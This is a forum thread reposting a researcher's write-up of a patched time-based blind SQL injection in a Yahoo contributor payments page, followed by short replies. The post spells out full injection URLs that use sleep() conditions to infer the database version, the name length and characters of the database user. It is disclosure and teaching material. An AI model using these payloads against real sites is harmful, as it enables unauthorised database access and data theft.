b3hr0uz Posted October 9, 2014 Report Share Posted October 9, 2014 First of all let’s figure out the database version:contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+substring((select+version()),1,1)=4+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69Which is false (version 4) and will sleep for 20 seconds. Let’s try Version 5:contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN substring((select version()),1,1)=5 THEN(sleep(1)) ELSE (sleep(20))END As BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69Which after a quick second we got returned to our data-table page. Now as far as the database name goes, I will demonstrate only a few things due to the fact that the user length was 24 letters and database name was 6 letters: username: ****wwcontributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+(select+LENGTH(DATABASE()))=6+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69and for the username: ***********@**.***.*.*** (taken out for security purposes) but as can see the 15th letter is show to be a “.” in the url below:http://contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN ASCII(substring((select user()),15,1))=46 THEN(sleep(1)) ELSE (sleep(60))END As BS)v)&sort_dir=asc&start_date=&override_id=131114After 36 days I finally heard back from Yahoo that it has been patched! Thank you for reading! In a few weeks I will be soon covering a XSPA and XSS in a few services.Behrouz Sadeghipour@NahamSecNahamSec.com | Behrouz Sadeghipour's Personal Website 1 Quote Link to comment Share on other sites More sharing options...
ncroot Posted December 30, 2014 Report Share Posted December 30, 2014 acunetix used for detect? ) Quote Link to comment Share on other sites More sharing options...
mundy. Posted March 12, 2015 Report Share Posted March 12, 2015 resolved.. Quote Link to comment Share on other sites More sharing options...
askwrite Posted March 12, 2015 Report Share Posted March 12, 2015 resolved..resolved ce? After 36 days I finally heard back from Yahoo that it has been patched! Thank you for reading! In a few weeks I will be soon covering a XSPA and XSS in a few services.si e si din 2014... Quote Link to comment Share on other sites More sharing options...